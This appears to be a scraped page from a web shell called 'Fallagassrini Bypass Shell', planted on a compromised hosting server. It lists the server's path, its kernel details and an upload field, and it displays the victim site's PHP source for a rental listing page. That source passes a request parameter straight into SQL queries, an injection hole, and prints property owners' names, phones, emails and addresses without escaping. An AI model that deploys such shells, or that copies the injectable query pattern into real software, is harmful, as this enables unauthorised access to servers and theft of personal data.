Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/h/a/p/happyrenas/old/happy-r.fr/transfere_pro/administration/templates/admin2/

Linux webd005.cluster105.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Upload File :
Current File : /home/h/a/p/happyrenas/old/happy-r.fr/transfere_pro/administration/templates/admin2/fiche.php

<?
session_start();
$page="fiche";
include("config.php");
$logement_id=$_REQUEST['logement_id'];

$myquery2 	= "SELECT * from logement where id=".$logement_id;
$logement = $db->get_row($myquery2);
		
$myquery1 	= "SELECT * from proprietaire where id=".$logement->id_proprietaire;
$proprietaire = $db->get_row($myquery1);
		
		

?>	

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" >
	<head>
		<title>Fiche descriptive de votre location</title>
		<meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
		<meta http-equiv="content-langage" content="fr"/>
		<style>
			* {
			padding:0px;
			margin:0px;
			-webkit-box-sizing: border-box;
			-moz-box-sizing: border-box;
			box-sizing: border-box; *behavior: url(http://www.melting-k.com/happy-rentals/boxsizing.htc);
			}
			@font-face {
				font-family: 'open';
				src: url('fonts/opensans-regular-webfont.eot');
				src: url('fonts/opensans-regular-webfont.eot?#iefix') format('embedded-opentype'),
					 url('fonts/opensans-regular-webfont.woff2') format('woff2'),
					 url('fonts/opensans-regular-webfont.woff') format('woff'),
					 url('fonts/opensans-regular-webfont.ttf') format('truetype'),
					 url('fonts/opensans-regular-webfont.svg#open_sansregular') format('svg');
				font-weight: normal;
				font-style: normal;
			}
			@font-face {
				font-family: 'open-l';
				src: url('fonts/opensans-light-webfont.eot');
				src: url('fonts/opensans-light-webfont.eot?#iefix') format('embedded-opentype'),
					 url('fonts/opensans-light-webfont.woff2') format('woff2'),
					 url('fonts/opensans-light-webfont.woff') format('woff'),
					 url('fonts/opensans-light-webfont.ttf') format('truetype'),
					 url('fonts/opensans-light-webfont.svg#open_sanslight') format('svg');
				font-weight: normal;
				font-style: normal;
			}
			body
			{
				width:800px; margin:auto; background:#fff; padding:30px 50px;
			}
			body>header
			{
				width:100%; position:relative; margin:auto; padding-bottom:20px; border-bottom:dashed 1px #eb6e30;
			}
			body>header>p
			{
				display:inline-block; vertical-align:middle; text-align:right; width:70%; font:24px 'open-l'; color:#eb6e30; line-height:22px;
			}
			body>header>p#logo
			{
				text-align:left; width:30%;
			}
			body>header>p>b
			{
				color:#58504d; font:normal 14px 'open';
			}
			body>section {
				width:100%; padding:30px 0px; border-top:dashed 1px #58504d;
			}
			body>section#coordonnees{
				border-top:none; padding-bottom:60px;
			}
			body>section#coordonnees>div{
				width:50%; display:inline-block; vertical-align:top;
			}
			h2 {
				font:normal 18px 'open-l'; margin-bottom:15px; color:#eb6e30;
			}
			body>section p{
				font:14px 'open-l'; line-height:25px; color:#58504d;
			}
			body>section p b{
				font:normal 14px 'open'; 
			}
		</style>
	</head>
	<body>
		<header>
			<p id="logo"><img src="http://www.happy-r.fr/images/logo-happy-rentals.jpg" alt="Logo Happy Rentals"/></p><!--
		---><p>Fiche descriptive de votre logement<br/><b>www.happy-r.fr</b></p>
		</header>
		<br>
							<?
							// LISTER LE CONTENU DU DOSSIER
							$dir = "../../assets/global/plugins/jquery-file-upload/server/php/files/".$logement->id_proprietaire."/logo/";
							$lister_exec = lister($dir);
							if (!empty($lister_exec))
							{
								foreach ($lister_exec as $key)
									{
										foreach ($key as $v2) 
										{
										if ($v2!='thumbnail') {
										?>
										<img src='<?echo $dir."/".$v2;?>' width=100>
										<?}}
									}
							}
							?>
		<section id="coordonnees">
			<div>
				<h2>L'hébergement :</h2>
				<p>
					<b>Nom de l’hébergement : <?echo substr($logement->label,0,40);?> (...)</b><br/>
					<b>Adresse : <?echo $logement->adresse;?>, <?echo $logement->cp;?> <?echo $logement->ville;?> <?echo $logement->pays;?></b><br/>
					<b>Label : <?echo $logement->label_interne;?></b><br/>
					<?if ($logement->label_interne!="Sans label") {?><b>Classement : <?echo $logement->etoile;?> étoiles</b><?}?>
				</p>
			</div><!--
		---><div>
				<h2>Le propriétaire :</h2>
				<p>
					<b>Nom, prénom : <?echo $proprietaire->nom;?> <?echo $proprietaire->prenom;?></b><br/>
					<b>Téléphone : <?echo $proprietaire->tel;?></b><br/>
					<b>Email : <?echo $proprietaire->mail;?></b><br/>
					<b>Adresse : <?echo $proprietaire->adresse;?>, <?echo $proprietaire->cp;?> <?echo $proprietaire->ville;?> <?echo $proprietaire->pays;?></b><br/>
					<br/><br/>
					
					<b>Site web : <?echo $logement->website;?></b>
				</p>
			</div>
		</section>
		<section>
			<div>
			<table>
				<?
				$tableau_photo 		=	$logement->tableau_photo;
				$photo				=	explode("|", $tableau_photo);
				$number=1;
				foreach($photo as $item)
				{
				
							if ($item!="" && file_exists("../../assets/global/plugins/jquery-file-upload/server/php/files/".$logement->id_proprietaire."/".$item))
							{
							$number++;
							?>
							<?if ($number % 2 == 0) {echo "<tr>";}?>
							<td><img width="310"  style="margin: 0px 20px" height="232" style="align:left;float:left;" src="<?echo $nom_de_domaine;?>/administration/assets/global/plugins/jquery-file-upload/server/php/files/<?echo $logement->id_proprietaire;?>/<?echo "$item";?>" alt=""></td>
							<?if ($number % 2 != 0) {echo "</tr>";}?>
							<?
							}
							?>
				<?
				}		
				?>
			</table>			
				
				<h2>Caractéristiques du logement :</h2>	
				<p class="logement">
					<b>Capacité : <?echo $logement->capacite;?></b><br/>
					<b>Piscine : <?echo $logement->piscine;?></b><br/>
					<b>Animaux : <?echo $logement->animaux;?></b><br/>
					
					<b>wifi : <?echo $logement->wifi;?></b><br/>
					<b>nombre de chambres : <?echo $logement->nombre_chambre;?></b><br/>
					<b>nombre de salle de bain : <?echo $logement->nombre_sdb;?></b><br/>
					<b>nombre de wc : <?echo $logement->nombre_wc;?></b><br/>
					<b>superficie : <?echo $logement->superficie;?></b><br/>
					
					
					
					<b>Caution : <?echo $logement->caution;?></b><br/>
					<b>Caution Animal : <?echo $logement->caution_animal;?></b><br/>
					<b>Prix de la location :  </b><br/>
					<b>Frais de dossier :  </b><br/>
					<b>Taxe de séjour par personne : <?echo $logement->taxe_sejour;?></b>
				</p>
			</div>
		</section>
		<section>
			<div>
				<h2>Description du logement : <?echo nl2br($logement->descriptif);?></h2>
				<p>
				</p>
			</div>
		</section>
	</body>
</html>


 

							

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net